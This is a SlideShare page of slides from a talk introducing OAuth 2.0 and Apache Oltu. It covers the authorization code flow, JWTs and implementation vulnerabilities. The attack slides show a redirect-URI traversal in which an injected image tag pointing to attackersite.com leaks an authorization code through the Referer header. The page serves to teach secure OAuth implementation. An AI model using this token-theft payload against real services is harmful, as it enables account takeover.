SlideShare a Scribd company logo

OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu

Antonio Sanso
Antonio Sanso

The document provides an introduction to OAuth 2.0 and the Apache Oltu framework for implementing OAuth in Java. It discusses the traditional OAuth authorization code grant "dance" involving a client, authorization server, and resource server. It also summarizes some common attacks like confused deputy and redirect URI exploitation. The document concludes with an overview of OAuth 2.0 for server to server authorization without user consent.

1 of 42
Downloaded 179 times
1
OAuth Hacks
 A Gentle Introduction to OAuth 2.0 and Apache Oltu 
 Antonio Sanso (@asanso) Software Engineer Adobe Research Switzerland
2
Who is this guy, BTW? eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ 9.eyJhdWQiOiJjb25uZWN0MjAxNCIsIm lzcyI6ImFzYW5zbyIsInN1YiI6ImFzYW5 zbyIsImV4cCI6MTQwMzYwMTU1OSwi aWF0IjoxNDAzNjAxNTU5fQ.9- MaGUiPg07ezuP9yAOaVLETQH6HMO pfoGwg_c0-PDw
3
Who is this guy, BTW? {  Software Engineer Adobe Research Switzerland {  VP (Chair) Apache Oltu (OAuth Protocol Implementation in Java) {  Committer and PMC Member for Apache Sling {  Google Security Hall of Fame, Facebook Security Whitehat, GitHub Security Bug Bounty
4
My (little) contribution to OAuth Not an RFC, still in the draft phase
5
Agenda { Introducing OAuth 2.0 { The “OAuth dance” { Introducing Apache Oltu { Implementing OAuth 2.0 { OAuth 2.0 Implementation Vulnerabilities { OAuth 2.0 server to server ★
6
Why OAuth? Several web sites offer you the chance to import the list of your contacts. It ONLY requires you giving your username and password. HOW NICE
7
A bit of history – OAuth 1.0a
8
A bit of history – OAuth 2.0 2 years X
9
The good { OAuth 2.0 is easier to use and implement (compared to OAuth 1.0) { Wide spread and continuing growing { Short lived Tokens { Encapsulated Tokens * Image taken from the movie "The Good, the Bad and the Ugly"
10
The bad { No signature (relies solely on SSL/TLS ), Bearer Tokens { No built-in security { Can be dangerous if used from not experienced people { Burden on the client * Image taken from the movie "The Good, the Bad and the Ugly"
11
The ugly { Too many compromises. Working group did not take clear decisions { Oauth 2.0 spec is not a protocol, it is rather a framework - RFC 6749 :The OAuth 2.0 Authorization Framework { Not interoperable - from the spec: “…this specification is likely to produce a wide range of non-interoperable implementations.” !! { Mobile integration (web views) { A lot of FUD * Image taken from the movie "The Good, the Bad and the Ugly"
12
So what should I use? { No many alternatives { OAuth 1.0 does not scale (and it is complicated)
13
OAuth flows { Authorization Code Grant (aka server side flow) ✓ { Implicit Grant (aka Client side flow) ✓ { Resource Owner Password Credentials Grant { Client Credentials Grant
14
OAuth Actors {  Resource Owner (Alice) { Client (Bob, worker at www.printondemand.biz ) { Server (Carol from Facebook) www.printondemand.biz
15
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Login and authorize 4. Here the Authz Code 5. Here we go Authorization: Bearer 1017097752d5f18f716cc90ac8a5e4c2a9ace6b9 ★
16
Traditional OAuth “dance” #2- client side flow 1616 www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go ★
17
Apache Oltu { 2010 - Project enters incubation with the name of Apache Amber { 2013 - Amber graduates from the incubator with the name Apache Oltu { OAuth protocol implementation in Java (OAuth client and server) { It also covers others "OAuth family" related implementations such as JWT, JWS
18
How difficult is to implement OAuth ? OAuth client OAuth server
19
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ GET /oauth/authorize?response_type=code&! client_id=bfq5abhdq4on33igtmd74ptrli-9rci_8_9&! scope=profile&state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251! &redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback ! HTTP/1.1! Host: server.oltu.com! ! Authorization Server
20
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ HTTP/1.1 302 Found! Location: https://www.printondemand.biz/callback? code=SplxlOBeZQQYbYS6WxSbIA! ! ! Authorization Server
21
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ Authorization Server
22
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server POST /oauth/token HTTP/1.1! Host: server.oltu.com! Authorization: Basic czZCaGRSa3F0MzpnWDFmQmF0M2JW ! Content-Type: application/x-www-form-urlencoded! ! grant_type=authorization_code&code=SplxlOBeZQQYbYS6WxSbIA! &state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251&! redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback ! ! !
23
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server HTTP/1.1 200 OK! Content-Type: application/json;charset=UTF-8! ! {! "access_token":"1017097752d5f18f716cc90ac8a5e4c2a9ace6b9”,! "expires_in":3600 ! }! !
24
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server
25
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Resource Server GET /profile/me HTTP/1.1! Host: server.oltu.com! Authorization: Bearer 1017097752d5f18f716cc90ac8a5e4c2a9ace6b9! !
26
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Resource Server
27
Bearer Token Authorization: Bearer 1017097752d5f18f716cc90ac8 a5e4c2a9ace6b9
28
Scalable OAuth Server { derive encryption key using salt1 { derive mac key using salt2 { generate random iv { encrypt. then mac(salt1 + iv + data) { transmit salt1, salt2 iv and encrypted
29
JSON Web Token eyJhbGciOiJIUzI1NiIs InR5cCI6IkpXVCJ9. eyJhdWQiOiJjb25uZ WN0MjAxNCIsImlzcy I6ImFzYW5zbyIsInN 1YiI6ImFzYW5zbyIsI mV4cCI6MTQwMzY wMTU1OSwiaWF0Ijo xNDAzNjAxNTU5fQ. MaGUiPg07ezuP9yA OaVLETQH6HMOpfo Gwg_c0-PDw {"alg":"HS256","typ":"JWT"} {"aud": "jug2015","iss":  "oltu","sub":"asanso","exp": 1403601559,"iat":1403601559} HMAC Header Claims Signature ★
30
JSON Web Token
31
OAuth entication orization { OAuth 2.0 is NOT an authentication protocol. It is an access delegation protocol. { It can-be-used as an authentication protocol { BUT HANDLE WITH CARE ★
32
Attack #1 “confused deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go 7. www.printondemand.biz uses the profile information from Facebook to log in N.B. www.printondemand.biz does not have any security. They have not Authenticated the User! * Image taken from the movie "The Devil Wears Prada"
33
Attack #1 “confused deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go What does this tell us ? That www.printondemand.biz authenticated us, given an Access Token 7. AUTHENTICATED * Image taken from the movie "The Devil Wears Prada"
34
Attack #1 “confused deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token a. Here we go 3. Login and authorize 4. Here the Access Token 5. Here we go www.dosomething.biz b. Give me the profile information, here is the Access Token c. AUTHENTICATED * Image taken from the movie "The Devil Wears Prada" ★
35
✔ ✔ ✗ ✗ ✗ ✗ ✗ Attack #2 – Exploit the redirect URI aka “Lassie Come Home” * Image taken from the movie “Lassie Come Home" 1. I want an Access Token 2. Printondemand wants an Access Token GET /oauth/authorize? response_type=code&client_id=213814055461514&redirect_uri=https%3A%2F %2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback! Host: https://graph.facebook.com! ✔
36
Attack #2 – Exploit the redirect URI aka “Lassie Come Home” 1. I want an Access Token 2. Printondemand wants an Access Token GET /oauth/authorize? response_type=code&client_id=213814055461514&redirect_uri=https%3A%2F %2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback%2F..../..../..../ asanso/a2f05bb7e38ba6af88f8! Host: https://graph.facebook.com! * Image taken from the movie “Lassie Come Home" ✔
37
Attack #2 – Exploit the redirect URI aka “Lassie Come Home” 1. I want an Access Token 2. Printondemand wants an Access Token HTTP/1.1 302 Found! Location: https://gist.github.com/auth/asanso/! a2f05bb7e38ba6af88f8?code=SplxlOBeZQQYbYS6WxSbIA! * Image taken from the movie “Lassie Come Home" ...! <img src="http://attackersite.com/"> ! ...! ! https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! GET / HTTP/1.1! Host: attackersite.com! Referer: https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! ?code=SplxlOBeZQQYbYS6WxSbIA! !
38
OAuth 2.0 server to server www.printondemand.biz 1. Create and sign JWT 2. Use JWT to request token 0. Generate key pair and upload public key Your application (OAuth Client) calls OAuth Server APIs on behalf of the service account, and user consent (Resource Owner) is not required (no human interaction). Why? How? 3. Here the Access Token 4. Use Access Token to call APIs ★ Register client OAuth Server 2 Server Flow
39
OAuth 2.0 server to server www.printondemand.biz 1. Create and sign JWT 2. Use JWT to request token 3. Here the Access Token 4. Use Access Token to call APIs OAuth Server 2 Server Flow
40
OAuth 2.0 server to server www.printondemand.biz 1. Create and sign JWT 2. Use JWT to request token 3. Here the Access Token 4. Use Access Token to call APIs OAuth Server 2 Server Flow ! curl -d 'grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt bearer! &assertion=ASSERTION' https://accounts.google.com/o/oauth2/token ! !
41
References { OAuth 2.0 web site - http://oauth.net/2/ { OAuth 2.0 - http://tools.ietf.org/html/rfc6749 { Bearer Token - http://tools.ietf.org/html/rfc6750 { Apache Oltu - http://oltu.apache.org/ { http://oauth.net/articles/authentication/ { JWT - http://tools.ietf.org/html/draft-ietf-oauth-json-web-token-23 { http://intothesymmetry.blogspot.ch/
42
Questions?
OAuth Hacks
 A Gentle Introduction to OAuth 2.0 and Apache Oltu 
 Antonio Sanso (@asanso) Software Engineer Adobe Research Switzerland
Who is this guy, BTW? eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ 9.eyJhdWQiOiJjb25uZWN0MjAxNCIsIm lzcyI6ImFzYW5zbyIsInN1YiI6ImFzYW5 zbyIsImV4cCI6MTQwMzYwMTU1OSwi aWF0IjoxNDAzNjAxNTU5fQ.9- MaGUiPg07ezuP9yAOaVLETQH6HMO pfoGwg_c0-PDw
Who is this guy, BTW? {  Software Engineer Adobe Research Switzerland {  VP (Chair) Apache Oltu (OAuth Protocol Implementation in Java) {  Committer and PMC Member for Apache Sling {  Google Security Hall of Fame, Facebook Security Whitehat, GitHub Security Bug Bounty
My (little) contribution to OAuth Not an RFC, still in the draft phase
Agenda { Introducing OAuth 2.0 { The “OAuth dance” { Introducing Apache Oltu { Implementing OAuth 2.0 { OAuth 2.0 Implementation Vulnerabilities { OAuth 2.0 server to server ★
Why OAuth? Several web sites offer you the chance to import the list of your contacts. It ONLY requires you giving your username and password. HOW NICE
A bit of history – OAuth 1.0a
A bit of history – OAuth 2.0 2 years X
The good { OAuth 2.0 is easier to use and implement (compared to OAuth 1.0) { Wide spread and continuing growing { Short lived Tokens { Encapsulated Tokens * Image taken from the movie "The Good, the Bad and the Ugly"
The bad { No signature (relies solely on SSL/TLS ), Bearer Tokens { No built-in security { Can be dangerous if used from not experienced people { Burden on the client * Image taken from the movie "The Good, the Bad and the Ugly"
The ugly { Too many compromises. Working group did not take clear decisions { Oauth 2.0 spec is not a protocol, it is rather a framework - RFC 6749 :The OAuth 2.0 Authorization Framework { Not interoperable - from the spec: “…this specification is likely to produce a wide range of non-interoperable implementations.” !! { Mobile integration (web views) { A lot of FUD * Image taken from the movie "The Good, the Bad and the Ugly"
So what should I use? { No many alternatives { OAuth 1.0 does not scale (and it is complicated)
OAuth flows { Authorization Code Grant (aka server side flow) ✓ { Implicit Grant (aka Client side flow) ✓ { Resource Owner Password Credentials Grant { Client Credentials Grant
OAuth Actors {  Resource Owner (Alice) { Client (Bob, worker at www.printondemand.biz ) { Server (Carol from Facebook) www.printondemand.biz
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Login and authorize 4. Here the Authz Code 5. Here we go Authorization: Bearer 1017097752d5f18f716cc90ac8a5e4c2a9ace6b9 ★
Traditional OAuth “dance” #2- client side flow 1616 www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go ★
Apache Oltu { 2010 - Project enters incubation with the name of Apache Amber { 2013 - Amber graduates from the incubator with the name Apache Oltu { OAuth protocol implementation in Java (OAuth client and server) { It also covers others "OAuth family" related implementations such as JWT, JWS
How difficult is to implement OAuth ? OAuth client OAuth server
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ GET /oauth/authorize?response_type=code&! client_id=bfq5abhdq4on33igtmd74ptrli-9rci_8_9&! scope=profile&state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251! &redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback ! HTTP/1.1! Host: server.oltu.com! ! Authorization Server
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ HTTP/1.1 302 Found! Location: https://www.printondemand.biz/callback? code=SplxlOBeZQQYbYS6WxSbIA! ! ! Authorization Server
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ Authorization Server
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server POST /oauth/token HTTP/1.1! Host: server.oltu.com! Authorization: Basic czZCaGRSa3F0MzpnWDFmQmF0M2JW ! Content-Type: application/x-www-form-urlencoded! ! grant_type=authorization_code&code=SplxlOBeZQQYbYS6WxSbIA! &state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251&! redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback ! ! !
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server HTTP/1.1 200 OK! Content-Type: application/json;charset=UTF-8! ! {! "access_token":"1017097752d5f18f716cc90ac8a5e4c2a9ace6b9”,! "expires_in":3600 ! }! !
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Resource Server GET /profile/me HTTP/1.1! Host: server.oltu.com! Authorization: Bearer 1017097752d5f18f716cc90ac8a5e4c2a9ace6b9! !
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Resource Server
Bearer Token Authorization: Bearer 1017097752d5f18f716cc90ac8 a5e4c2a9ace6b9
Scalable OAuth Server { derive encryption key using salt1 { derive mac key using salt2 { generate random iv { encrypt. then mac(salt1 + iv + data) { transmit salt1, salt2 iv and encrypted
JSON Web Token eyJhbGciOiJIUzI1NiIs InR5cCI6IkpXVCJ9. eyJhdWQiOiJjb25uZ WN0MjAxNCIsImlzcy I6ImFzYW5zbyIsInN 1YiI6ImFzYW5zbyIsI mV4cCI6MTQwMzY wMTU1OSwiaWF0Ijo xNDAzNjAxNTU5fQ. MaGUiPg07ezuP9yA OaVLETQH6HMOpfo Gwg_c0-PDw {"alg":"HS256","typ":"JWT"} {"aud": "jug2015","iss":  "oltu","sub":"asanso","exp": 1403601559,"iat":1403601559} HMAC Header Claims Signature ★
JSON Web Token
OAuth entication orization { OAuth 2.0 is NOT an authentication protocol. It is an access delegation protocol. { It can-be-used as an authentication protocol { BUT HANDLE WITH CARE ★
Attack #1 “confused deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go 7. www.printondemand.biz uses the profile information from Facebook to log in N.B. www.printondemand.biz does not have any security. They have not Authenticated the User! * Image taken from the movie "The Devil Wears Prada"
Attack #1 “confused deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go What does this tell us ? That www.printondemand.biz authenticated us, given an Access Token 7. AUTHENTICATED * Image taken from the movie "The Devil Wears Prada"
Attack #1 “confused deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token a. Here we go 3. Login and authorize 4. Here the Access Token 5. Here we go www.dosomething.biz b. Give me the profile information, here is the Access Token c. AUTHENTICATED * Image taken from the movie "The Devil Wears Prada" ★
✔ ✔ ✗ ✗ ✗ ✗ ✗ Attack #2 – Exploit the redirect URI aka “Lassie Come Home” * Image taken from the movie “Lassie Come Home" 1. I want an Access Token 2. Printondemand wants an Access Token GET /oauth/authorize? response_type=code&client_id=213814055461514&redirect_uri=https%3A%2F %2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback! Host: https://graph.facebook.com! ✔
Attack #2 – Exploit the redirect URI aka “Lassie Come Home” 1. I want an Access Token 2. Printondemand wants an Access Token GET /oauth/authorize? response_type=code&client_id=213814055461514&redirect_uri=https%3A%2F %2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback%2F..../..../..../ asanso/a2f05bb7e38ba6af88f8! Host: https://graph.facebook.com! * Image taken from the movie “Lassie Come Home" ✔
Attack #2 – Exploit the redirect URI aka “Lassie Come Home” 1. I want an Access Token 2. Printondemand wants an Access Token HTTP/1.1 302 Found! Location: https://gist.github.com/auth/asanso/! a2f05bb7e38ba6af88f8?code=SplxlOBeZQQYbYS6WxSbIA! * Image taken from the movie “Lassie Come Home" ...! <img src="http://attackersite.com/"> ! ...! ! https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! GET / HTTP/1.1! Host: attackersite.com! Referer: https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! ?code=SplxlOBeZQQYbYS6WxSbIA! !
OAuth 2.0 server to server www.printondemand.biz 1. Create and sign JWT 2. Use JWT to request token 0. Generate key pair and upload public key Your application (OAuth Client) calls OAuth Server APIs on behalf of the service account, and user consent (Resource Owner) is not required (no human interaction). Why? How? 3. Here the Access Token 4. Use Access Token to call APIs ★ Register client OAuth Server 2 Server Flow
OAuth 2.0 server to server www.printondemand.biz 1. Create and sign JWT 2. Use JWT to request token 3. Here the Access Token 4. Use Access Token to call APIs OAuth Server 2 Server Flow
OAuth 2.0 server to server www.printondemand.biz 1. Create and sign JWT 2. Use JWT to request token 3. Here the Access Token 4. Use Access Token to call APIs OAuth Server 2 Server Flow ! curl -d 'grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt bearer! &assertion=ASSERTION' https://accounts.google.com/o/oauth2/token ! !
References { OAuth 2.0 web site - http://oauth.net/2/ { OAuth 2.0 - http://tools.ietf.org/html/rfc6749 { Bearer Token - http://tools.ietf.org/html/rfc6750 { Apache Oltu - http://oltu.apache.org/ { http://oauth.net/articles/authentication/ { JWT - http://tools.ietf.org/html/draft-ietf-oauth-json-web-token-23 { http://intothesymmetry.blogspot.ch/
Questions?

Recommended

Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015
Alvaro Sanchez-Mariscal
 
Stateless authentication for microservices - Greach 2015
Stateless authentication for microservices - Greach 2015Stateless authentication for microservices - Greach 2015
Stateless authentication for microservices - Greach 2015
Alvaro Sanchez-Mariscal
 
OAuth for your API - The Big Picture
OAuth for your API - The Big PictureOAuth for your API - The Big Picture
OAuth for your API - The Big Picture
Apigee | Google Cloud
 
JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJS
robertjd
 
Implementing OAuth
Implementing OAuthImplementing OAuth
Implementing OAuth
leahculver
 
OAuth using PHP5
OAuth using PHP5OAuth using PHP5
OAuth using PHP5
Nurulazrad Murad
 
OAuth2 Authentication
OAuth2 AuthenticationOAuth2 Authentication
OAuth2 Authentication
Ismael Costa
 
An Introduction to OAuth2
An Introduction to OAuth2An Introduction to OAuth2
An Introduction to OAuth2
Aaron Parecki
 
Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Stateless authentication with OAuth 2 and JWT - JavaZone 2015Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Alvaro Sanchez-Mariscal
 
Using OAuth with PHP
Using OAuth with PHPUsing OAuth with PHP
Using OAuth with PHP
David Ingram
 
Securing RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID ConnectSecuring RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID Connect
Jonathan LeBlanc
 
Implementing OAuth with PHP
Implementing OAuth with PHPImplementing OAuth with PHP
Implementing OAuth with PHP
Lorna Mitchell
 
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry BuzdinModern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Java User Group Latvia
 
2016 pycontw web api authentication
2016 pycontw web api authentication 2016 pycontw web api authentication
2016 pycontw web api authentication
Micron Technology
 
Stateless authentication for microservices
Stateless authentication for microservicesStateless authentication for microservices
Stateless authentication for microservices
Alvaro Sanchez-Mariscal
 
OAuth 2.0
OAuth 2.0OAuth 2.0
OAuth 2.0
Uwe Friedrichsen
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java Applications
Stormpath
 
Token Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJSToken Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJS
Hüseyin BABAL
 
Rest API Security
Rest API SecurityRest API Security
Rest API Security
Stormpath
 
Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015
Alvaro Sanchez-Mariscal
 
Stateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTStateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWT
Gaurav Roy
 
Single-Page-Application & REST security
Single-Page-Application & REST securitySingle-Page-Application & REST security
Single-Page-Application & REST security
Igor Bossenko
 
REST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTsREST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTs
Jon Todd
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTs
robertjd
 
Demystifying OAuth 2.0
Demystifying OAuth 2.0Demystifying OAuth 2.0
Demystifying OAuth 2.0
Karl McGuinness
 
Json web token api authorization
Json web token api authorizationJson web token api authorization
Json web token api authorization
Giulio De Donato
 
OAuth 2 Presentation
OAuth 2 PresentationOAuth 2 Presentation
OAuth 2 Presentation
Mohamed Ahmed Abdullah
 
What the Heck is OAuth and OpenID Connect - DOSUG 2018
What the Heck is OAuth and OpenID Connect - DOSUG 2018What the Heck is OAuth and OpenID Connect - DOSUG 2018
What the Heck is OAuth and OpenID Connect - DOSUG 2018
Matt Raible
 
JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2
Rodrigo Cândido da Silva
 
How to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematicianHow to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematician
Antonio Sanso
 

More Related Content

What's hot (20)

Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Stateless authentication with OAuth 2 and JWT - JavaZone 2015Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Alvaro Sanchez-Mariscal
 
Using OAuth with PHP
Using OAuth with PHPUsing OAuth with PHP
Using OAuth with PHP
David Ingram
 
Securing RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID ConnectSecuring RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID Connect
Jonathan LeBlanc
 
Implementing OAuth with PHP
Implementing OAuth with PHPImplementing OAuth with PHP
Implementing OAuth with PHP
Lorna Mitchell
 
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry BuzdinModern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Java User Group Latvia
 
2016 pycontw web api authentication
2016 pycontw web api authentication 2016 pycontw web api authentication
2016 pycontw web api authentication
Micron Technology
 
Stateless authentication for microservices
Stateless authentication for microservicesStateless authentication for microservices
Stateless authentication for microservices
Alvaro Sanchez-Mariscal
 
OAuth 2.0
OAuth 2.0OAuth 2.0
OAuth 2.0
Uwe Friedrichsen
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java Applications
Stormpath
 
Token Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJSToken Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJS
Hüseyin BABAL
 
Rest API Security
Rest API SecurityRest API Security
Rest API Security
Stormpath
 
Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015
Alvaro Sanchez-Mariscal
 
Stateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTStateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWT
Gaurav Roy
 
Single-Page-Application & REST security
Single-Page-Application & REST securitySingle-Page-Application & REST security
Single-Page-Application & REST security
Igor Bossenko
 
REST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTsREST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTs
Jon Todd
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTs
robertjd
 
Demystifying OAuth 2.0
Demystifying OAuth 2.0Demystifying OAuth 2.0
Demystifying OAuth 2.0
Karl McGuinness
 
Json web token api authorization
Json web token api authorizationJson web token api authorization
Json web token api authorization
Giulio De Donato
 
OAuth 2 Presentation
OAuth 2 PresentationOAuth 2 Presentation
OAuth 2 Presentation
Mohamed Ahmed Abdullah
 
What the Heck is OAuth and OpenID Connect - DOSUG 2018
What the Heck is OAuth and OpenID Connect - DOSUG 2018What the Heck is OAuth and OpenID Connect - DOSUG 2018
What the Heck is OAuth and OpenID Connect - DOSUG 2018
Matt Raible
 
Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Stateless authentication with OAuth 2 and JWT - JavaZone 2015Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Alvaro Sanchez-Mariscal
 
Using OAuth with PHP
Using OAuth with PHPUsing OAuth with PHP
Using OAuth with PHP
David Ingram
 
Securing RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID ConnectSecuring RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID Connect
Jonathan LeBlanc
 
Implementing OAuth with PHP
Implementing OAuth with PHPImplementing OAuth with PHP
Implementing OAuth with PHP
Lorna Mitchell
 
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry BuzdinModern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Java User Group Latvia
 
2016 pycontw web api authentication
2016 pycontw web api authentication 2016 pycontw web api authentication
2016 pycontw web api authentication
Micron Technology
 
Stateless authentication for microservices
Stateless authentication for microservicesStateless authentication for microservices
Stateless authentication for microservices
Alvaro Sanchez-Mariscal
 
OAuth 2.0
OAuth 2.0OAuth 2.0
OAuth 2.0
Uwe Friedrichsen
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java Applications
Stormpath
 
Token Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJSToken Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJS
Hüseyin BABAL
 
Rest API Security
Rest API SecurityRest API Security
Rest API Security
Stormpath
 
Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015
Alvaro Sanchez-Mariscal
 
Stateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTStateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWT
Gaurav Roy
 
Single-Page-Application & REST security
Single-Page-Application & REST securitySingle-Page-Application & REST security
Single-Page-Application & REST security
Igor Bossenko
 
REST Service Authetication with TLS & JWTs
